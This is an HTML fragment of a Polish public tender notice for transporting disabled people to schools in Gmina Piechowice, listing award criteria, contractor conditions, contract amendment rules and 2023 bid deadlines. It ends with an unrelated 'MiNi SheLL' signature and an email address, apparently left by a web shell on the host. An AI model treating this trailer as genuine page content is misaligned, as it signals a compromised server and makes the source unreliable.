class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kierowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas zorganizowania zastępstwa</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Wykonawca spełni warunek, jeżeli wykaże, że posiada aktualną licencję na przewóz osób uprawniającą do podejmowania i wykonywania działalności gospodarczej w zakresie krajowego transportu drogowego osób, zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym.<br/>2) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że:<br/>a) dysponuje lub będzie dysponował co najmniej 2 (dwoma) kierowcami posiadającymi uprawnienia do kierowania pojazdami oraz co najmniej 2 (dwoma) opiekunami spełniającymi wymagania określone w OPZ, stanowiącym załącznik nr 7 do SWZ. Ocena spełnienia powyższego warunku dokonana będzie na podstawie Wykazu osób zgodnie z załącznikiem nr 4 do SWZ;<br/>b) dysponuje co najmniej dwoma pojazdami przystosowanymi do przewozu osób niepełnosprawnych mieszczącymi co najmniej 9 osób łącznie z kierowcą i opiekunem. Ocena spełnienia powyższego warunku dokonana będzie na podstawie Wykazu sprzętu dostępnego Wykonawcy zgodnie z załącznikiem nr 5 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy w zakresie art. 108 ust. 1 pkt 5 p.z.p. o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia<br/>16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr 3 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Wykaz osób skierowanych do realizacji zamówienia, spełniających wymagania określone w rozdziale VIII pkt 2 ppkt 4 lit. a SWZ wraz z informacjami dotyczącymi zakresu wykonywanych czynności, posiadanych kwalifikacji zawodowych i podstawy dysponowania tymi osobami – załącznik nr 4 do SWZ.<br/>2) Wykaz sprzętu, zgodny ze wzorem stanowiącym załącznik nr 5 do SWZ, dostępnego Wykonawcy do realizacji zamówienia publicznego, spełniającego wymagania określone w rozdziale VIII pkt 2 ppkt 4 lit. b SWZ wraz z informacjami na temat ich marki, modelu, numeru rejestracyjnego oraz informacją o podstawie do dysponowania tym sprzętem.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) oświadczenie, o którym mowa w Rozdziale XII pkt 3 SWZ, z którego wynika, które usługi wykonają poszczególni Wykonawcy - w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (spółki cywilne, konsorcja),<br/>2) zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w Rozdziale XI pkt 3 SWZ - w przypadku Wykonawców polegających na zdolnościach lub sytuacji podmiotów udostępniających zasoby. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia, o których mowa w Rozdziale X pkt 1 ppkt 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Zgodnie z art. 117 ust. 4 p.z.p. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Dopuszcza się zmiany umowy na podstawie art. 455 ust. 1 pkt 3 i 4 oraz ust. 2 ustawy p.z.p.<br/>2. W przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia – odpowiednie zapisy umowy zostaną dostosowane do obowiązującego stanu prawnego.<br/>3. Zmiany postanowień umowy mogą dotyczyć:<br/>1) zmiany sposobu realizacji zamówienia, jeśli rozwiązania zaproponowane przez Zamawiającego lub Wykonawcę przyczynią się do uzyskania wyższej jakości końcowej zamówienia, przy czym zmiana ta nie będzie miała wpływu na podwyższenie wynagrodzenia Wykonawcy;<br/>2) zmiany liczby przewożonych osób poprzez ich zmniejszenie lub zwiększenie;<br/>3) zmiany trasy (lokalizacji punktów zbiórki osób przewożonych na terenie Gminy Piechowice) oraz adresów placówek oświatowych;<br/>4) zmiany maksymalnego nominalnego wynagrodzenia Wykonawcy w przypadkach konieczności uruchomienia kolejnego pojazdu w związku ze wzrostem liczby przewożonych osób niepełnosprawnych.<br/>4. Zmiany, o których mowa w ust. 3 mogą nastąpić w przypadku:<br/>1) zmiany przepisów krajowych lub unijnych dotyczących przewozu osób;<br/>2) gdy zmiany przyczynią się do wyższej jakości i efektywności realizacji zamówienia;<br/>3) gdy zmiany te spowodowane są zmianami organizacyjnymi Zamawiającego (między innymi związane z wprowadzeniem zmiany organizacji dowozu osób niepełnosprawnych do placówek oświatowych).<br/>5. Zmniejszenie zakresu zamówienia w przypadkach, o których mowa w ust. 3 pkt 3 i 4, nie może być wyższe niż 20 % wartości maksymalnego wynagrodzenia Wykonawcy.<br/>6. Wynagrodzenie Wykonawcy może ulec zmianie w przypadku zmiany:<br/>1) stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>2) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,<br/>3) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne,<br/>4) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych - jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>7. Zamawiający przewiduje możliwość zmiany wysokości wynagrodzenia w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/811571</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-07 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-06</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com